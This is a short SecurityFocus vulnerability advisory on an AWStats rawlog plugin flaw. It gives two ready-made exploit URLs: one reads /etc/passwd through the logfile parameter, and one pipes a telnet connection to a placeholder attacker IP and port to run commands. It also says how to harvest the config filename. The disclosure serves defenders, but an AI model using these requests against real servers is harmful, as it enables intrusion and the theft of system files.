AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability

There is no exploit required, the following example is available:

http://www.example.com/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog&logfile=/etc/passwd
http://www.example.com/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>

Where the '&config' parameter value is the configuration file for www.example.com. It is reported that the configuration filename can be harvested from the HTML source of the awstats page for the target site.


 

Privacy Statement
Copyright 2010, SecurityFocus